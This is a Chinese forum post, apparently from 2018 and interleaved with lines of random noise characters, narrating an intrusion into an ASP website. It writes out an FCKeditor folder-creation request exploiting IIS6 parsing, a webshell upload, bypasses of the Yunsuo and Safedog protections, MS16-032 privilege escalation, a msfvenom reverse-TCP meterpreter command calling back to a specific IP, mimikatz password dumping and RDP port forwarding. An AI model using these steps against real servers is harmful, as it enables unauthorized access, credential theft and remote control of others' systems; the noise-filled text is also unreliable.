|
- z/ F" i0 r6 S2 b + e7 C" t9 Z" t$ R0 W
$ c$ b, P3 _1 Q( M, c
0 R+ v1 z( s9 G) V+ B4 X: G
|
7 t1 ^7 _5 t! n$ t 4 i' l4 m+ S: i; S' |6 i1 u
0 k. w5 y) H2 r: B/ a6 |
一、 利用getwebshell篇
- ?4 A- q( Q" T1 \( _1 D
6 E u4 g3 U5 [; }6 @4 M$ R
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
% C+ t3 e0 o$ G1 S
Y% D, X% j- _0 D9 P5 U+ m
- S4 t' [" L8 l, {: P, K下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
' t. H( n, q' o' O3 _
; Y& a- b' c6 q8 e7 W3 a3 E
下面我们构造一个asp目录,如: 3 P. Y6 ^4 y7 W! H! V% Q1 r
( O: S( G9 l9 a 9 y1 f' K) W6 Q/ } Z4 f
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 6 y7 y0 z& R1 f _( A
9 G: h% _/ u: j# N( I
6 ~( O( Y: m \& T2 \2 ]6 w7 v 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
0 D% T' K* X) X/ u/ D
$ J, G3 {) k; d1 v! z
一、 绕过安全狗云锁提权并且加账号
6 z' h- i" q1 b* C! S' y
5 G; G: u3 R" Q( D& ?/ n
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
) \1 L' ~5 h4 ]- c" v
) X1 g u4 Q- E1 q9 ^4 b! _
如图:
* R# a3 n; ^5 W4 ~/ a: X# `/ q( y$ x% v
' ^% J0 }0 r" H1 A( ?; a4 W
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
4 ` J3 h9 A( w* Y7 v" _8 x
$ W: A& Y+ v3 p4 J8 b一、 利用metasploit
( f; \$ o; D9 {. }
" d! N F5 h+ e3 r" N% \% }% d首先用pentestbox生成一个64位的payload如下命令
/ @8 M9 }; Z1 s3 Y
; F& A. ?9 |- r% H4 M2 g3 L4 C0 ]; \
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
B0 Z; D" P% Q" K' g6 E
3 f" X' o, q7 w% D9 ^4 p! L为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
4 K3 [5 b# ~9 d [( ~7 ~2 Z
1 e) G% m/ O* P n" ?# l3 J
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
9 z. o ?$ |: w. ~2 a1 O
/ ^( \4 I3 d) _1 I8 R
下面我们来做一个监听如下命令:
3 x( E5 K. j8 |1 x* d* ]0 u A4 \
9 \2 Q! M- h# Z1 L ]: M8 x5 Zportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
% x7 H2 ^! \% S6 q- ^
3 B, N* e8 b1 S7 m4 b4 S4 m ! E( P2 r) i- {4 [! L
|
# ]# r, E" x' [2 Z0 ~6 ]4 ^ D4 d# p 0 i4 G8 O3 B1 G+ s
6 ?/ E, P4 j8 e* ^4 y8 Y3 h2 [7 L
* }% z( ]% J9 n! ~5 Z: a* Z! Z. q4 G( D
, `; ^- m" d8 A: P6 P- `& V
7 o1 A0 a& R s- q6 Y
9 u; p" W, [+ B/ V
6 e6 r' }$ Q1 {; Z( _
; s0 E) U7 f1 `( N* g8 G- R$ [' T
, }6 f" B; y8 z' l
* K! A! a3 J2 c9 V; _: {
; b2 z7 i. c7 @9 P
+ U; n& ` v7 a- a4 ?2 k. ` | 
发表于 2018-10-20 20:31:43
收藏
分享
支持
反对
匿名
发表于 2021-11-20 23:30:06